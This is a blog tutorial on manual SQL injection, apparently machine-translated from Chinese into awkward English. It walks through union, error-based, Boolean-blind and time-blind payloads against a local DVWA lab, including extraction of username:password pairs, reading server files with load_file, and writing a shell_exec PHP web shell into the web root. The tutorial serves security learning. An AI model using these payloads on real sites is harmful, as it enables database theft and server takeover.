"Web Security" sixth bullet: Manual SQL injection

Some time ago, after a new understanding of SQL injection, this article was written. Originally prepared to contribute, because the content is too basic to be beaten back, think of the Tun is also not interesting, issued to send to ~ ~ Originally had a lot of pictures, but the blog Park hair map is very troublesome, Word document links will be posted at the end of the article, interested can download the next look.

Note: The target audience for this article is to have a certain understanding of SQL injection, can use some tools (sqlmap, pangolin, etc.) for automated SQL injection testing, but also want to understand the principle of tools and SQL injection principle of children's shoes.

0x00 Basic theory

0x01 Injection Tips & Basic modes:

First of all, some of the following functions and basic statements have some understanding.

1. General Union Select:

SELECT * from user where id= ' "union select 1,2,3,4 from fabiao#+ '. js

2. and select:

URL and (select COUNT (username) from admin) >0//Guess the database column name, and you can guess the data type

URL and (select Length (username) from admin limit 1) >0//Guess database column name length: Modify the following >0 is the length of the guessing solution

URL and (select top 1 ASCII (SUBSTRING (username)) from admin) >0//Guess the content: guess the content should correspond to the ASCII table, ASCII, substring is the function of MySQL, MSSQL is slightly different

3. Time-Based blinds:

URL Union Select 1,benchmark (1000000,MD5 (' Test ')), 1 from user where userid=1 and ord (substring (username,1,1)) =97

URL Union Select if (substring (password,1,1) = ' A ', Benchmark (10000000,sha (1)), 0) User,password from Mysql.user where User = ' Root '

4. Write to File:

Mysql> Select ' <?php echo shell_exec ("Ifconfig");?> ' into outfile ' f:/wamp/www/shell.php '; It seems that when the page is encoded as GBK,,<> will be escaped as an entity encoding, and should be considered in conjunction with file containment vulnerabilities.

5. Read the file:

URL Union Select 1,load_file (' E:/wamp/www/test.txt '), 2,3,4,5,6--+//Note that MySQL reads and writes files with \ 's time to escape, that is E:\\wamp\\www\\test.txt

6. Reading data from a database

Mysql > select Concat (Username,0x3a,password) from admin; Read data from a database in the form of a user name: password

URL and ASCII (substring (select Concat (Username,0x3a,password) from admin), >0

7. Notes:

For MySQL/*! */

Other databases ignore statements between ellipses and are often used to bypass WAF

8. Example of no space required for injection:

Select/**/*/**/from/**/user; /**/can act as a space

0x02 High function of the usage rate:

Concat (STR1,STR2,STR3) String connection

Group_concat (DISTINCT column_name) is used in conjunction with group by, adding DISTINCT to connect different column_name

ASCII () Get ASCII code

SUBSTRING (str,pos,length) to string str, starting from POS, intercept length

Benchmark (' test ') is used in the time-blind, and executes 1 million times MD5 (' test ') to perform the effect of delay injection.

if (condition,true_sentence,false_sentence) is used in the time blind, if condition is established, executes the statement in the second argument, otherwise executes the statement in the third argument.

0X03 determine in what way to inject:

After reading the above section, then the problem comes, there is union injection, there is and injection, there is what blind, SQL injection in the end which strong?

The method of judging is a kind of appearance. Add single quote ' View results:

1. Error ==> Error Injection | | Union injection

2. Do not error, but the page information changes (blocking the error message) ==> Boolean-based blind | | Union injection

3. No change in page information ==> time-based blind | | Union injection

0x04 Time-Based blinds:

Time-based blinds are a little tricky. Here's to the point.

What kind of environment will use time-based blinds? The currently executing statement does not echo.

Example: Login.

$num = SELECT COUNT (*) from user where uid= ' $uid ' and Sleep (5)--+ ' and password= ' $pwd '

if ($num) return 1;

else return 0;

Depending on the number of data bars queried by the database, there are two return values, success and failure. At the time of injection, it is possible to return a failure due to a syntax error caused by an unreasonable construction of the injected statement. It is also possible that some conditions (such as ASCII (SUBSTRING (password,1,1)) >80) are not met, and return failure. I only need a second return, but the first kind of return can cause interference. For the sake of separation, I let execute the correct statement, delay a few seconds to come back, so the distinction is open ~ This is the time-based blind.

In the same vein, there are update,delete and other statements, but also the use of time-based blind, here is not detailed, if interested, can refer to http://drops.wooyun.org/tips/2078 "using INSERT, Update and delete injection fetch data "

0X10 Real-Combat chapter

Use the DVWA system to explain the safety level to the lowest

0x11 MySQL built-in database:

When the MYSQ version is greater than 5.0, there will be a built-in database--information_schema, with many database fields, data tables and other related information.

One of the most commonly used data tables is columns, which, literally, is the field name, but this data table also contains information about the field and the database in which it is stored.

For example, I want to extract all the database names:

Select Group_concat (Distinct table_schema) from Information_schema.columns;

Extract all the table names in the DVWA database:

Select GROUP_CONCAT (DISTINCT table_name) from Information_schema.columns where table_schema= ' DVWA ';

0x12 Error Injection:

There are three kinds of error in MySQL injected--floor, Extractvalue, Updatexml. Just use Extractvalue to give an example.

After the submission, MySQL error, according to the above conclusions, for the error injection.

Base Injection statement: And Extractvalue (1, concat (0X5C, (select table_name from information_schema.tables limit 1));

1. Exploding the database

Http://127.0.0.1:8080/dvwa/vulnerabilities/sqli/?Submit=Submit&id=1 ' and
Extractvalue (1, concat (0x5c, (select Table_schema frominformation_schema.columns GROUP by Table_schema limit 2,1)) )--+

Different databases can be burst by changing the limit in the injected statement

2. Burst Data Sheet

and exploded data sheet is a principle

3. Fields in the exploded table

There are some limitations on the length of the XPath error, which is a single

Http://127.0.0.1:8080/dvwa/vulnerabilities/sqli/?Submit=Submit&id=1 ' and
Extractvalue (1, concat (0x5c, (select column_name frominformation_schema.columns where table_schema= ' Dvwa ' and Table_ Name= ' users ' limit))--+

4. Data explosion

According to the field information of the last burst, go to the corresponding data table burst data. Here you can use the concat to connect the fields that need to explode together and burst out.

Http://127.0.0.1:8080/dvwa/vulnerabilities/sqli/?Submit=Submit&id=1 ' and
Extractvalue (1, concat (0x5c, (select Concat (User,0x5c,password) from Userslimit 1))--+

0X13 Union injection:

Personal preference when using union~~union, ask: Two queries must have the same number of columns. So try to figure out how many columns you've queried for the first time ~

1. Determine the number of columns

Http://127.0.0.1:8080/dvwa/vulnerabilities/sqli_blind/?Submit=Submit&id=1 ' ORDER by 1--+

Change the number of the order by continuously until the page error occurs, or the page changes, and the critical number is the number of columns

Note that the number of columns in this place is the number of columns in the query, not the number of columns in the data table.

As an example:

Select User,password the number of columns from the users//query is 2

SELECT * from users//Query columns = = number of columns in the data table

2. Determine what data is displayed on the page

Because not all of the contents of the query will be displayed on the page (some of the content output is commented or not output), in order to echo the data, it is necessary to see which columns are available.

If there is no available echo position, then it cannot be injected with union.

3. Explode the database (all the results are rough ~):

Http://127.0.0.1:8080/dvwa/vulnerabilities/sqli_blind/?Submit=Submit&id=1 '
Union Select Group_concat (DISTINCT table_schema), 2 frominformation_schema.columns--+

0X14 based on a boolean blind note:

If the union injection does not find the Echo point and the error message is masked, the Boolean blind is considered. The blinds often require repeated repetition. Here are just a few simple examples.

1. Basic Judgment method

Http://127.0.0.1:8080/dvwa/vulnerabilities/sqli/?Submit=Submit&id=1 '
and ASCII (SUBSTRING ((select password from users limit 1), ()) >51--+

One-to-one verification, zoom out, and navigate to an ASCII value.

0x15 Time-Based blinds:

Time blinds should be the last option, no way. Because the time blind is through the delay of the database to determine whether the injection is successful, whether a condition is established. The efficiency is very low, the injection speed is also very slow. The use of the scene is mentioned above and needs to be well understood. The examples in this paragraph are not appropriate.

1. Determine if there is a time blind

Union form (if the effect is not obvious can be two another 0): http://127.0.0.1:8080/dvwa/vulnerabilities/sqli/? Submit=submit&id=1 ' Union Select1,benchmark (10000000,MD5 ("Test"))--+

Boolen form: Http://127.0.0.1:8080/dvwa/vulnerabilities/sqli/?Submit=Submit&id=1 ' and Sleep (5)--+

2. Explode the database:

The specific process is similar to the Boolean blind.

0X30 tools used in the article:

Firefox browser +hackbar (browser extensions)

DVWA (open source Web penetration test system)

Resources:

http://drops.wooyun.org/tips/2078 using insert,update and delete injections to get data

http://phpinfo.me/2014/01/02/146.html MySQL 3 types of error mode injection

http://drops.wooyun.org/tips/143 Sqlmap User Manual

Http://www.cnblogs.com/kuoaidebb/p/4570101.html Blog Park-wide Love babe

Doc Document: Http://files.cnblogs.com/files/kuoaidebb/SQL%E6%B3%A8%E5%85%A5%E5%8D%9A%E5%AE%A2.zip

"Web Security" sixth bullet: Manual SQL injection